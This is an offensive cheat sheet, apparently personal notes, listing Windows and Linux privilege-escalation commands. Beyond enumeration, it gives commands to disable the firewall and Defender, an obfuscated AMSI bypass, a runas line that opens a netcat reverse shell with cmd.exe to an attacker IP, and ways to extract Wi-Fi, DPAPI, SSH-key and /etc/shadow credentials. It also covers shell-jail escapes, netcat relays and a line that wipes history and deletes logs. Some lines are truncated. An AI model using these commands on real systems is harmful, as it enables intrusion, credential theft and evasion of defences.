Windows Privilege Escalation

Windows Local Privilege Escalation

==System Info==
#Windows Version and Configuration
::OS Version::
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

::Extract patches and updates::
wmic qfe

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

::List all env variables::
Get-ChildItem Env: | ft Key,Value

::List all drives::
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
==Users & Groups Enumeration==
::Get current username::
echo %USERNAME% || whoami

::List user privilege::
whoami /priv
whoami /groups

::List all users::
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name

::List logon requirements; useable for bruteforcing::
net accounts

::Get details about a user (i.e. administrator, admin, current user)::
net user administrator
net user admin
net user %USERNAME%
List all local groups

net localgroup
Get-LocalGroup | ft Name

::Get details about a group (i.e. administrators)::
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

==Network Enumeration==
::List all network interfaces, IP, and DNS.::
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

::Hosts file::
type C:\Windows\System32\drivers\etc\hosts

::List current routing table::
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

::List the ARP table::
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

::List all current connections::
netstat -ano

::List firewall state and current configuration::
netsh advfirewall firewall dump


netsh firewall show state
netsh firewall show config

::List firewall's blocked ports::
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports

::Disable firewall & Defender::
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

::List all network shares::
net share

::SNMP Configuration::
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

==Windows Defender==
::Check the status of Defender::
PS C:\> Get-MpComputerStatus

::Disable Real Time Monitoring
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true

sc config WinDefend start= disabled
sc stop WinDefend

==AppLocker Enumeration==
::List of AppLocker rules::
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective

C:\> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

::Default PowerShell locations in a Windows system.::

::Example of AMSI Bypass.::
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)

::Powershell history::
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\TheShahzada\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

::Password in Alternate Data Stream::
PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag

==Processes Enumeration and Tasks==
::What processes are running?::

tasklist /v
net start
sc query
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

::Which processes are running as "system"?::
tasklist /v /fi "username eq system"

::Do you have powershell magic?::
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion

::List installed programs::
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

::List services::
net start
wmic service list brief
tasklist /SVC

::Scheduled tasks::

schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

::Startup tasks::

#wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

==Windows Credentials==
::Winlogon Credentials::
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

/* Use the cmdkey to list the stored credentials on the machine. */
cmdkey /list
Currently stored credentials:
 Target: Domain:interactive=WORKGROUP\Administrator
 Type: Domain Password
 User: WORKGROUP\Administrator

/* Then you can use runas with the /savecred options in order to use the saved credentials. The following example is calling a remote binary via an SMB share */
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

/* Using runas with a provided set of credential. */
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

/* In theory, the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.

The DPAPI key is stored in the same file as the master key that protects the users private keys. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it usingdir from the cmd, but you can list it from PS). */

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

/* You can use mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.
The credentials files protected by the master password are usually located in: */
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

::Saved RDP Connections::
HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
HKCU\Software\Microsoft\Terminal Server Client\Servers\

::Recently Run Commands::

::Remote Desktop Credential Manager::
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
/* Use the Mimikatz dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module */

:***:Files and Registry (Credentials):***:

::Putty Creds::
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

::Putty SSH Host Keys::
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

::SSH keys in registry::
reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys

/* If ssh-agent service is not running and you want it to automatically start on boot run: */
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

::Cloud Credentials::
##From user home

::SAM & SYSTEM backups::
# Usually %SYSTEMROOT% = C:\Windows

::Unattended files::
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

::IIS Web Config::
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue


Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

/* Example of web.config with credentials: */
<authentication mode="Forms"> 
    <forms name="login" loginUrl="/admin">
        <credentials passwordFormat = "Clear">
            <user name="Administrator" password="SuperAdminPassword" />

==Write Permissions==

/* Check if you can modify some config file to read some special file or if you can modify some binary that is going to be executed by an Administrator account (schedtasks).
A way to find weak folder/files permissions in the system is doing: */
accesschk.exe /accepteula 
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}} 

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Note: Will be continue..../


Linux Privilege Escalation

Linux Enumeration for Escalation Root Access

  === Operating System ===

## What's the distribution type? What version?

cat /etc/issue

cat /etc/*-release

cat /etc/lsb-release

cat /etc/redhat-release


uname -n   // System hostname

hostname // As above

## What's the Kernel version? Is it 64-bit?

cat /proc/version   

uname -a

uname -r  // Kernel release

uname -mrs 

rpm -q kernel 

dmesg | grep Linux

ls /boot | grep vmlinuz-

cat /proc/cpuinfo   // CPU information

  === What can be learnt from the environmental variables? ===

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout



  === Is there a printer? ===

lpstat -a

  === Users & Groups: === 

cat /etc/passwd  

cat /etc/group   // List all groups on the system

cat /etc/shadow  // Show user hashes – Privileged command

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all super user accounts

finger   // Users currently logged in

pinky   // As above

users  // As above

who -a // As above

w   // Who is currently logged in and what they’re doing

last   // Listing of last logged on users

lastlog   // Information on when all users last logged in

lastlog --user root // Information on when the specified user last logged in

  === User & Privilege Information: ===



cat /etc/sudoers  // Who’s allowed to do what as root – Privileged command

sudo -l  // Can the current user perform anything as root

cat /etc/passwd | cut -d:    # List of users

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users

awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users

cat /etc/sudoers

## What has the user is doing? Is there any password in plain text? What have they been editing?

cat ~/.bash_history

cat ~/.nano_history

cat ~/.atftp_history

cat ~/.mysql_history 

cat ~/.php_history

What user information can be found? 

cat ~/.bashrc

cat ~/.profile

cat /var/mail/root

cat /var/spool/mail/root

Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!

ps aux | grep root

ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/

ls -alh /sbin/

dpkg -l

rpm -qa

ls -alh /var/cache/apt/archivesO

ls -alh /var/cache/yum/ 

  === Environmental Information: ===

env  // Display environmental variables

set  // As above

echo $PATH  // Path information

history // Displays  command history of current user

cat /etc/profile // Display default system variables

## Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!

ps aux | grep root

ps -ef | grep root

    === What applications are installed? What version are they? Are they currently running? ===

ls -alh /usr/bin/

ls -alh /sbin/

dpkg -l

rpm -qa

ls -alh /var/cache/apt/archivesO

ls -alh /var/cache/yum/ 

    === Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? ===

cat /etc/syslog.conf 

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf 

cat /etc/inetd.conf 

cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ 

ps aux | grep root  // View services running as root

cat /etc/inetd.conf  // List services managed by inetd

cat /etc/xinetd.conf // As above for xinetd

    === Installed programs === 

dpkg -l Installed packages (Debian)

rpm -qa Installed packages (Red Hat)

sudo -V Sudo version – does an exploit exist?

httpd -v Apache version

apache2 -v As above

apache2ctl (or apachectl) -M List loaded Apache modules

mysql --version Installed MYSQL version details

perl -v Installed Perl version details

java -version Installed Java version details

python --version Installed Python version details

ruby -v Installed Ruby version details

find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc) Locate ‘useful’ programs (netcat, wget etc)

which %program_name% (i.e. nc, netcat, wget, nmap etc) As above

    === SSH info ? ===

## Can private-key information be found? 

cat ~/.ssh/authorized_keys

cat ~/.ssh/

cat ~/.ssh/identity

cat ~/.ssh/

cat ~/.ssh/id_rsa

cat ~/.ssh/

cat ~/.ssh/id_dsa

cat /etc/ssh/ssh_config

cat /etc/ssh/sshd_config

cat /etc/ssh/

cat /etc/ssh/ssh_host_dsa_key

cat /etc/ssh/

cat /etc/ssh/ssh_host_rsa_key

cat /etc/ssh/

cat /etc/ssh/ssh_host_key

  === Jobs/Tasks: ===

crontab -l -u %username% // Display scheduled jobs for the specified user – Privileged command

ls -la /etc/cron* // Scheduled jobs overview (hourly, daily, monthly etc)

ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null // What can ‘others’ write in /etc/cron* directories

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

ls -alh  /etc/cron.daily

ls -alh  /etc/cron.weekly

ls -alh  /etc/cron.monthly

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

    === Interesting Files: ===

find /home –name .rhosts -print 2>/dev/null // Find rhost config files

ls -ahlR /root/     // See if you can access other user directories to find interesting files – Privileged command

cat ~/.bash_history // Show the current users’ command history

ls -la ~/._history // Show the current users’ various history files

ls -la ~/.ssh/ Check // for interesting ssh files in the current users’ directory

ls -la /usr/sbin/in.* // Check Configuration of inetd services

find /var/log -type f -exec ls -la {} ; 2>/dev/null List files in specified directory (/var/log)

find /var/log -name *.log -type f -exec ls -la {} ; 2>/dev/null List .log files in specified directory (/var/log)

find /etc/ -maxdepth 1 -name .conf -type f -exec ls -la {} ; 2>/dev/null List .conf files in /etc (recursive 1 level)

ls -la /etc/.conf As above

lsof -i -n  ## List open files (output will depend on account privileges)

lsof -u root  ## lists all open files and processes by user root

## Which configuration files can be written in /etc/? Able to reconfigure a service?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone

ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner

ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group

ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone

find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone 

## Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm

find / -writable -type d 2>/dev/null        # world-writable folders

find / -perm -222 -type d 2>/dev/null      # world-writable folders

find / -perm -o+w -type d 2>/dev/null    # world-writable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writable & executable folders

## Any "problem" files? Word-writable, "nobody" files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writable files

find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

## What sensitive files can be found? 

cat /etc/passwd

cat /etc/group

cat /etc/shadow

ls -alh /var/mail/

## Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/

ls -ahlR /home/

## What can be found in /var/ ? 

ls -alh /var/log

ls -alh /var/mail

ls -alh /var/spool

ls -alh /var/spool/lpd 

ls -alh /var/lib/pgsql

ls -alh /var/lib/mysql

cat /var/lib/dhcp3/dhclient.leases

## Any settings/files (hidden) on website? Any settings file with database information?

ls -alhR /var/www/

ls -alhR /srv/www/htdocs/ 

ls -alhR /usr/local/www/apache22/data/

ls -alhR /opt/lampp/htdocs/ 

ls -alhR /var/www/html/

## Is there anything in the log file(s) (Could help with "Local File Includes"!)

cat /etc/httpd/logs/access_log

cat /etc/httpd/logs/access.log

cat /etc/httpd/logs/error_log

cat /etc/httpd/logs/error.log

cat /var/log/apache2/access_log

cat /var/log/apache2/access.log

cat /var/log/apache2/error_log

cat /var/log/apache2/error.log

cat /var/log/apache/access_log

cat /var/log/apache/access.log

cat /var/log/auth.log

cat /var/log/chttp.log

cat /var/log/cups/error_log

cat /var/log/dpkg.log

cat /var/log/faillog

cat /var/log/httpd/access_log

cat /var/log/httpd/access.log

cat /var/log/httpd/error_log

cat /var/log/httpd/error.log

cat /var/log/lastlog

cat /var/log/lighttpd/access.log

cat /var/log/lighttpd/error.log

cat /var/log/lighttpd/lighttpd.access.log

cat /var/log/lighttpd/lighttpd.error.log

cat /var/log/messages

cat /var/log/secure

cat /var/log/syslog

cat /var/log/wtmp

cat /var/log/xferlog

cat /var/log/yum.log

cat /var/run/utmp

cat /var/webmin/miniserv.log

cat /var/www/logs/access_log

cat /var/www/logs/access.log

ls -alh /var/lib/dhcp3/

ls -alh /var/log/postgresql/

ls -alh /var/log/proftpd/

ls -alh /var/log/samba/

# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log,, mail.log, mail.warn, messages, syslog, udev, wtmp

## Search for specific strings inside a file

file ./somefile   ## file info

strings ./*.txt | grep password

find / -name “*.log” |xargs grep -i pass

grep -l -i pass /var/log/*.log 2>/dev/null

find / -maxdepth 10 -name *.conf -type f | grep -Hn pass; 2>/dev/null // searches for the string 'password' and output the line number

find / -maxdepth 10 -name *etc* -type f | grep -Hn pass; 2>/dev/null  //as above, but in *etc*

grep -l -i pass /var/log/*.log 2>/dev/null Check log files for keywords (‘pass’ in this example) and show positive matches

find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} ; 2>/dev/null Find .conf files (recursive 4 levels) and output line number where the word password is located

grep -i user [filename]

grep -i pass [filename]

grep -C 5 "password" [filename]

find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla 

hexeditor ./file

objdump -D -M intel ./file

objdump -D -M x86-64 ./file >> dump64.file

cat /var/apache2/

cat /var/lib/mysql/mysql/user.MYD 

cat /root/anaconda-ks.cfg

find / -name "network-secret.txt"

locate "network-secret.txt"


    === Permissions ===

## What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID

find / -perm -u=s -type f 2>/dev/null     #Find FILES that have the sticky bit set. 

find / -perm -1000 -type d 2>/dev/null    # Find DIRECTORIES w/ Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here

find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.

find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID

for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null 

## Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm

find / -writable -type d 2>/dev/null        # world-writable folders

find / -perm -222 -type d 2>/dev/null      # world-writable folders

find / -perm -o+w -type d 2>/dev/null    # world-writable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writable & executable folders

Any "problem" files? Word-writable, "nobody" files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writable files

find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files


## We found cp (copy) in the above list and now we are abusing it:

cp -f --no-preserve=all /etc/shadow /var/www/html/joomla/shadow.txt

Few things to keep in mind:

## (1) at the destination, the file owner will be root but the group will be that of the current user and 

## (2) notice the use of "--no-preserve" this is needed to read out protected files.

## A lot of ways we can abuse this, update the shadow file with a new account, modify sudoers, plant ssh key + modify sshd_config ## + reboot,or cron.hourly.

    == File system ==

df -ah   // all FS info, including pseudo, duplicate, INACCESSIBLE file systems

## Are there any unmounted file-systems?

cat /etc/fstab

    === Networking, Routing & Communications: ===

/sbin/ifconfig -a // List all network interfaces

cat /etc/network/interfaces // As above

cat /etc/sysconfig/network 

arp -a Display ARP communications

route Display route information

cat /etc/resolv.conf Show configured DNS sever addresses

netstat -antp List all TCP sockets and related PIDs (-p Privileged command)

netstat -anup List all UDP sockets and related PIDs (-p Privileged command)

iptables -L List rules – Privileged command

cat /etc/services View port numbers/services mappings

    === What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? ===

cat /etc/resolv.conf

cat /etc/sysconfig/network

cat /etc/networks

iptables -L



    === Common Shell Escape Sequences: ===

## If commands are limited, you break out of the "jail" shell?

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

/bin/sh -i

:!bash vi, vim

:set shell=/bin/bash:shell vi, vim

!bash man, more, less

find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; find

awk 'BEGIN {system("/bin/bash")}' awk

--interactive nmap

perl -e 'exec "/bin/bash";' Perl 



    === What other users & hosts are communicating with the system? ===

lsof -i 

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig --list

chkconfig --list | grep 3:on

    === Whats cached? IP and/or MAC addresses ===

arp -e


/sbin/route -nee

    === Is packet sniffing possible? What can be seen? Listen to live traffic ===

# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

tcpdump tcp dst 80 and tcp dst 21

tcpdump -n dst host -vvv -n -w file.cap

    === Is port forwarding possible? Redirect and interact with traffic from another view ==

# rinetd

# fpipe

FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080: root@    # Local Port

ssh -R 8080: root@    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 80 >backpipe    # Port Relay

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

## Is tunneling possible? Send commands locally, remotely

ssh -D -N [username]@[ip] 

proxychains ifconfig

#copy bash to a new subshell

mount an NFS share from a remote server, copy bash from local to remote and execute

cp -p ./bash /mnt/share/newbash

./newbash -p

    === Preparation & Finding Exploit Code ===

## What development tools/languages are installed/supported?

find / -name perl*

find / -name python*

find / -name gcc* 

find / -name cc

## How can files be uploaded?

find / -name wget

find / -name nc*

find / -name netcat*

find / -name tftp* 

find / -name ftp 

#copy files with SSH

scp username@b:/path/to/file /path/to/destination   //while being logged into A

scp /path/to/file username@a:/path/to/destination  //while being logged into B

#compile C with gcc

gcc ./ajaira_exploit.c -o exploit

#clear history, iptables and logs

iptables -F; history -c; find ./ -name “*.log” |xargs rm -f

# Postfix version

postconf -d | grep mail_vers

./Will_be_continue | everything is collected